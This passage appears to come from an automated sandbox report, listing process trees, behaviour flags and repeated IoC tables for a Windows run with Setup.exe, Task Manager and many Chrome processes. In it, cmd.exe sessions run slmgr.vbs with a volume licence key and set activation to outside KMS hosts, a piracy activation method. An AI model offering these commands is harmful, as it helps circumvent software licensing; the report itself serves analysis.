2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

taskmgr.exe

pid	process
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 3948 wrote to memory of 4472	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4472	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4440	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4440	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4440	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4440	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4440	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4440	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4440	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4440	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4440	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4440	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4440	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4440	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4440	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4440	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4440	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4440	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4440	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4440	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4440	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4440	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4440	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4440	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4440	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4440	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4440	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4440	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4440	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4440	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4440	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4440	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4440	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4440	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4440	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4440	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4440	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4440	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4440	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4440	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4440	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 4440	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 736	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 736	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 1832	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 1832	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 1832	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 1832	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 1832	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 1832	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 1832	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 1832	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 1832	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 1832	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 1832	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 1832	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 1832	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 1832	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 1832	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 1832	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 1832	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 1832	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 1832	3948	chrome.exe	chrome.exe
PID 3948 wrote to memory of 1832	3948	chrome.exe	chrome.exe

C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
1⤵
PID:3444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3444 -s 968
2⤵
- Program crash
PID:536

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3444 -ip 3444
1⤵
PID:1608

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of WriteProcessMemory
PID:3948

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffdd4ec4f50,0x7ffdd4ec4f60,0x7ffdd4ec4f70
2⤵
PID:4472

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1664 /prefetch:2
2⤵
PID:4440

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2012 /prefetch:8
2⤵
PID:736

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2304 /prefetch:8
2⤵
PID:1832

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2960 /prefetch:1
2⤵
PID:2584

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3160 /prefetch:1
2⤵
PID:2536

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3716 /prefetch:1
2⤵
PID:2328

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4516 /prefetch:8
2⤵
PID:4084

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4632 /prefetch:8
2⤵
PID:3788

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4788 /prefetch:8
2⤵
PID:1148

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4044 /prefetch:1
2⤵
PID:2024

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4708 /prefetch:1
2⤵
PID:1000

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3960 /prefetch:8
2⤵
PID:1936

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5216 /prefetch:8
2⤵
PID:1092

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:8
2⤵
PID:3316

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5460 /prefetch:8
2⤵
PID:2184

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5236 /prefetch:8
2⤵
PID:384

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5200 /prefetch:8
2⤵
PID:5112

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1
2⤵
PID:4728

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1
2⤵
PID:1424

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5748 /prefetch:1
2⤵
PID:1048

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4048 /prefetch:1
2⤵
PID:816

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3036 /prefetch:1
2⤵
PID:2844

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
2⤵
PID:2148

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4544 /prefetch:1
2⤵
PID:4540

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3224 /prefetch:8
2⤵
PID:4716

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3168 /prefetch:1
2⤵
PID:2184

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5808 /prefetch:1
2⤵
PID:3356

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5896 /prefetch:1
2⤵
PID:2056

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5868 /prefetch:1
2⤵
PID:1000

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3792 /prefetch:8
2⤵
PID:4856

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1512 /prefetch:8
2⤵
PID:5216

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2120 /prefetch:8
2⤵
PID:5292

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2712 /prefetch:8
2⤵
PID:5328

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2656 /prefetch:8
2⤵
PID:5536

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3144 /prefetch:1
2⤵
PID:6048

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2844 /prefetch:1
2⤵
PID:6136

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5596 /prefetch:1
2⤵
PID:5180

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4020 /prefetch:8
2⤵
PID:2948

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1
2⤵
PID:212

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:1
2⤵
PID:5132

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4860 /prefetch:2
2⤵
PID:1808

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5608 /prefetch:8
2⤵
PID:4024

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5760 /prefetch:8
2⤵
PID:5552

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1424 /prefetch:8
2⤵
PID:4476

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1496 /prefetch:8
2⤵
PID:960

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1592,6814944803632263898,604274447879214938,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=884 /prefetch:8
2⤵
PID:5004

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4068

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
1⤵
- Checks computer location settings
- Modifies registry class
PID:1500

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Windows\system32\slmgr.vbs" /ipk
2⤵
PID:3228

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Windows\system32\slmgr.vbs" /ipk W269N-WFGWX-YVC9B-4J6C9-T83GX
2⤵
PID:1428

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Windows\system32\slmgr.vbs" /skms kms.xspace.in
2⤵
PID:2524

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Windows\system32\slmgr.vbs" /ato
2⤵
PID:5784

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
1⤵
PID:5952

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
1⤵
- Checks computer location settings
- Modifies registry class
PID:4960

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Windows\system32\slmgr.vbs" /ipk W269N-WFGWX-YVC9B-4J6C9-T83GX
2⤵
PID:1236

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Windows\system32\slmgr.vbs" /skms kms8.msguides.com
2⤵
PID:6072

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Windows\system32\slmgr.vbs" /ato
2⤵
PID:4076

C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe"
1⤵
- Drops file in Program Files directory
PID:4308

C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4308_1329370629\ChromeRecovery.exe
"C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4308_1329370629\ChromeRecovery.exe" --appguid={8A69D345-D564-463c-AFF1-A69D9E530F96} --browser-version=89.0.4389.114 --sessionid={0ad5c29a-4b43-4ebd-b260-df6eac5bb7d0} --system
2⤵
- Executes dropped EXE
PID:5652

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:2740

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdd4ec4f50,0x7ffdd4ec4f60,0x7ffdd4ec4f70
2⤵
PID:2444

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1600,10804307783304692724,11665452552762543276,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1616 /prefetch:2
2⤵
PID:5380

C:\Program Files\Google\Chrome\Application\chrome.exe
